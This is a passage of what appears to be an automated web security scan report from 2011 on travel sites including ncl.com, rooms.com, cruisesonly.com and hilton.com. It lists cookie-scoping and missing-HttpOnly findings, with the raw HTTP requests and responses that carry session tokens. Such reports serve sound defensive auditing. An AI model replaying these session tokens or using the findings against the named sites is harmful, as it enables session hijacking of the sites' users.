Cookie: stop_mobi=yes; Cookie=R4252675302; Ncl_countryName=US; Ncl_region=TX; Ncl_city=Dallas; Ncl_latitude=32.809799; Ncl_longitude=-96.799301; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; s_pers=%20s_nr%3D1317646086034-New%7C1320238086034%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.2.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317645006-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie,Accept-Encoding
X-Ncl-SLog: 10.5.44.31
Content-Length: 7543
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 12:47:48 GMT
Connection: close
Set-Cookie: Cookie=R4252675302; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 12:47:48 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 12:47:48 GMT; path=/; domain=ncl.com

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.81. http://www2.ncl.com/sitemap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /sitemap

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitemap HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645618-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:40:18 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:41 GMT; path=/; domain=ncl.com
Content-Length: 59876

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
11.82. https://www2.ncl.com/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /vacations

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: MISS
Last-Modified: Mon, 03 Oct 2011 13:02:52 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1317646972"
X-Ncl-SLog: 10.5.44.30
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 13:02:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R1788641230; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:02:53 GMT; path=/; domain=ncl.com
Content-Length: 195543

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12. Cookie without HttpOnly flag set  previous  next
There are 155 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

12.1. http://vacations.rooms.com/wthrooms/CPCSS  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vacations.rooms.com
Path:   /wthrooms/CPCSS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wthrooms/CPCSS?DD=WTHROOMS HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://vacations.rooms.com/wthrooms/CPMerchandisingPage?DD=WTHROOMS&headTemplate=DestinationHotelHead&bodyTemplate=NewYorkHotelBody&isShowFramework=true&WT.mc_id=WTHROOMS_NewYorkHotel_032511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:50 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 05:50:02 GMT
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/css
Cache-Control: private
Content-Length: 20077

stam            { color:#393939; font-family:Arial; font-size:0.69em; }
body { color:#393939; font-family:Arial; font-size:0.69em; }
td { color:#393939; font-family:Arial; font-size:11px; }
...[SNIP]...
12.2. http://vacations.rooms.com/wthrooms/CPGateway  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vacations.rooms.com
Path:   /wthrooms/CPGateway

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wthrooms/CPGateway?DD=WTHROOMS&fromLocation=&toLocation=New%20York%20City&hotelFromDate=11/10/2011&hotelToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=339.58&hotelDuration=3&specificHotelName=Wellington%20Hotel&airCompany=&doSearch=T HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://vacations.rooms.com/wthrooms/CPMerchandisingPage?DD=WTHROOMS&headTemplate=DestinationHotelHead&bodyTemplate=NewYorkHotelBody&isShowFramework=true&WT.mc_id=WTHROOMS_NewYorkHotel_032511
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642189940:ss=1317642189940

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:44:55 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:44:55 GMT
Expires: -1
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 45038

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Vacation Packages</title>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<!-- [start] WebTrends
...[SNIP]...
12.3. http://vacations.rooms.com/wthrooms/CPMerchandisingPage  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vacations.rooms.com
Path:   /wthrooms/CPMerchandisingPage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wthrooms/CPMerchandisingPage?DD=WTHROOMS&headTemplate=DestinationHotelHead&bodyTemplate=NewYorkHotelBody&isShowFramework=true&WT.mc_id=WTHROOMS_NewYorkHotel_032511 HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.rooms.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:42:49 GMT
Expires: -1
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 159531


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

   <title>Vacation Packages</title>
   <meta name="description" content="Vacation
...[SNIP]...
12.4. http://vacations.rooms.com/wthrooms/CPScreenMessageCSS  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vacations.rooms.com
Path:   /wthrooms/CPScreenMessageCSS

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wthrooms/CPScreenMessageCSS?DD=WTHROOMS&page=HotelDetails HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://vacations.rooms.com/wthrooms/HotelDetails?DD=WTHROOMS&searchId=-755244140&packageIndex=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642189940:ss=1317642189940

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:03 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:45:03 GMT
Expires: -1
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/css
Cache-Control: private
Content-Length: 16651

label
{
text-align: left;
width: 100%;
display: block;
float: left;
margin: 0 0 4px 0;
}


a
{
text-decoration: none;
}


.masterfont
{
font-family: Arial, Helvetica,"Helv
...[SNIP]...
12.5. http://vacations.rooms.com/wthrooms/HotelDetails  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vacations.rooms.com
Path:   /wthrooms/HotelDetails

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wthrooms/HotelDetails?DD=WTHROOMS&searchId=-755244140&packageIndex=0 HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://vacations.rooms.com/wthrooms/CPGateway?DD=WTHROOMS&fromLocation=&toLocation=New%20York%20City&hotelFromDate=11/10/2011&hotelToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=339.58&hotelDuration=3&specificHotelName=Wellington%20Hotel&airCompany=&doSearch=T
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642189940:ss=1317642189940

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:45:02 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:45:02 GMT
Expires: -1
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 47082


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>


<!-- Title -->


   <title>Hotels</title>


<!-- Tagg
...[SNIP]...
12.6. http://vacations.rooms.com/wthrooms/Search  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vacations.rooms.com
Path:   /wthrooms/Search

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wthrooms/Search?fromLocation=&toLocation=New%20York%20City&fromTime=&toTime=&numAirSearchSegments=&datehotelFromDate=11%2F10%2F11&datehotelToDate=11%2F13%2F11&datecarFromDate=11%2F10%2F11&datecarToDate=11%2F13%2F11&carPickupTime=&carReturnTime=&products=H&rooms=&minors=0&adults1=2&infants=0&childAge1=-1&childAge2=-1&childAge3=-1&childAge4=-1&minors1=0&club=&association=&hotelRating=&hotelDueTime=&ignorePSC=Yes&carClass=NoPreference&specificHotelName=Wellington%20Hotel&mode=advanced&go=yes&screen=Search&trackLanding=1&DD=WTHROOMS&pricepoint=yes&refId=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08 HTTP/1.1
Host: vacations.rooms.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://vacations.rooms.com/wthrooms/CPGateway?DD=WTHROOMS&fromLocation=&toLocation=New%20York%20City&hotelFromDate=11/10/2011&hotelToDate=11/13/2011&combinationType=H&adultsNum=2&pricepoint=yes&nonDiscountedPricePerNight=339.58&hotelDuration=3&specificHotelName=Wellington%20Hotel&airCompany=&doSearch=T
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CPcon=SVNmVFhSQUkGLEJtbVVXZUtCVF9WAi9CbGpVUWRQWFJEUhguX2h0T1FiUUZaQlEDLVVka05bZVFH; neatCookie=enabled; CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08; NSC_JOaksdonexqqkmfdksdxeobfzo4u3cu=ffffffff09e4422045525d5f4f58455e445a4a423667; NSC_JOzk4stad1yyufndg4seu3dcmzgkbde=ffffffff09e3883145525d5f4f58455e445a4a423660; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317642189940:ss=1317642189940

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 12:45:01 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 03 Oct 2011 12:45:01 GMT
Expires: -1
Set-Cookie: CDENsession=YwpjJR6CAaq99LsQg0CpfJQug.CWMDEN08
P3P: CP="NOI DSP LAW NID CUR TAIa CONi OUR STP UNI STA"
Location: http://vacations.rooms.com/wthrooms/HotelDetails?DD=WTHROOMS&searchId=1350909456&packageIndex=0
Content-Length: 0
Content-Type: text/html;charset=UTF-8

12.7. http://www.cruisesonly.com/cs/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cruisesonly.com
Path:   /cs/default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cs/default.asp HTTP/1.1
Host: www.cruisesonly.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.cruisesonly.com/groupcruises/promos/whatisgroup.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7BD8541B8C%2D79AE%2D4C96%2D9B36%2D0670FE94C35D%7D; ASPSESSIONIDSSCCSDSR=LNIDLMMAFLKGLMDCEIKIDAKI; NSC_WJQ-DSVJTFTPOMZ.DPN=ffffffff095b1c5645525d5f4f58455e445a4a423660; BrowserTest=ON; _msuuid_7879jl5289=63E87AE9-BEEA-49B1-9132-2AF4FA00DDDD; WDUID=%7B59AC8C91%2D64B1%2D4406%2D827F%2DA32E25423DAC%7D; sid=6386; JSESSIONID=E5DDBE0407B36DF2815ADD375CCA88F0; NSC_WJQ-BQDI-DSVJTFTPOMZ.DPN=ffffffff095b1d2245525d5f4f58455e445a4a423660; __utma=204213570.186654333.1317645662.1317645662.1317645662.1; __utmb=204213570.4.9.1317645669909; __utmc=204213570; __utmz=204213570.1317645662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 12:42:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Cteonnt-Length: 95828
Content-Type: text/html
Set-Cookie: AFF%5FCID=%22%22; expires=Wed, 02-Nov-2011 04:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDACRRBDRT=LCAAOGNALNLIEDHCBDAMGOOP; path=/
Cache-control: private
Content-Length: 95828


<script language="JavaScript">


    function CallUrchin(event_name)
{
       
           pageTracker._trackPageview(event_name);
           //alert(event_name);
       
       return true;
}
...[SNIP]...
12.8. http://www.hilton.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.hilton.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Content-Length: 2
Content-Type: text/html
P3p: policyref="/w3c/p3p.xml", CP="NOI DSP DEVa TAIa OUR BUS UNI"
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Location: http://www1.hilton.com/en_US/hi/index.do
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:41 GMT
Connection: close
Set-Cookie: JSESSIONID=S2VXAICTPUQJWCSGBIYMVCQ; path=/


12.9. http://www.ncl.com/nclweb/cbooking/submitCruiseDetailsForm.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ncl.com
Path:   /nclweb/cbooking/submitCruiseDetailsForm.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nclweb/cbooking/submitCruiseDetailsForm.html?packageId=1912713&itineraryCode=15819 HTTP/1.1
Host: www.ncl.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www2.ncl.com/freestyle-cruise/hawaii-cruise-and-hotel-packages
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; s_vi=[CS]v1|2744D75E8501245D-40000107C0197879[CE]; seen_modal=1; ak_location=US,CA,SANJOSE,807; Ncl_region=CA; __utma=35125182.139189855.1317646034.1317646034.1317646034.1; __utmb=35125182.4.10.1317646034; __utmc=35125182; __utmz=35125182.1317646034.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_pers=%20s_nr%3D1317646122505-New%7C1320238122505%3B; s_sess=%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3Dnclcom%253D%252526pid%25253Dcontent%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%2525253A%25252520content%2525253A%25252520freestyle%25252520experience%2525253A%25252520hawaii-cruise-and-hotel-packages%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.ncl.com%2525252Fnclweb%2525252Fcbooking%2525252FsubmitCruiseDetailsForm.html%2525253FpackageId%2525253D1912713%25252526itineraryCode%2525253D1581%252526ot%25253DA%3B

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.ncl.com/nclweb/cbooking/pricingQualifierForm.html;jsessionid=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336
Vary: Accept-Encoding
P3P: policyref="http://www.ncl.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONi HISo TELi OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV LOC"
Content-Type: text/html; charset=ISO-8859-1
Date: Mon, 03 Oct 2011 12:48:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=TJvWyL4R63hTQFyHrGXm89trfZ2cPT8k!102196336; path=/
Set-Cookie: NCLPERSIST1=868788416.20480.0000; path=/
Content-Length: 431

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www.ncl.com/nclweb/cbooking
...[SNIP]...
12.10. http://www.rooms.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.rooms.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.rooms.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WDVID=%7B1B9F7B9F%2D1F10%2D4DD2%2DB809%2DCD55B60D376A%7D; WDUID=%7BBF289CFB%2DB6F0%2D4E0A%2DA974%2DB1F61E804CC5%7D; ASPSESSIONIDACSASCSR=NALAJOMALKFNOGAMNPMOOCBP; NSC_WJQ-XXX.SPPNT.DPN=ffffffff095b1c4a45525d5f4f58455e445a4a423660; _msuuid_787eqs11081=D85AF39A-2805-4796-9D69-7DBA0749D890; __utma=197011247.946458482.1317645735.1317645735.1317645735.1; __utmb=197011247.2.9.1317645765426; __utmc=197011247; __utmz=197011247.1317645735.1.1.utmcsr=cruisesonly.com|utmccn=(referral)|utmcmd=referral|utmcct=/sc.do

Response

HTTP/1.1 302 Object moved
Date: Mon, 03 Oct 2011 12:42:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP CURa ADMa DEVa TAIa CONo HISa OUR BUS IND PHY ONL UNI PUR COM NAV INT DEM STA"
X-Powered-By: ASP.NET
Location: /images_unique/blank.gif
Content-Length: 145
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACRRBDRT=KPPPNGNAIODLJDNKDMIDDIJL; path=/
